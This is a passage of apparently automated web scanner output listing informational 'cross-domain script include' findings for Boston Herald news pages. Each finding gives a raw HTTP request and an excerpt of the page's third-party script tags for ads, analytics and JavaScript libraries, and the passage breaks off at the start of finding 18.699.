   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.691. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.692. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.693. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.694. http://www.bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.695. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.696. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.2.10.1296251844; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.697. http://www.bostonherald.com/news/us_politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/us_politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/us_politics/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.698. http://www.bostonherald.com/photobox/index.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /photobox/index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /photobox/index.bg?type=home&page=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.699. http://www.bostonherald.com/projects/boston_pensions/

Summary

Severity:   Information
Confidence:   Certain
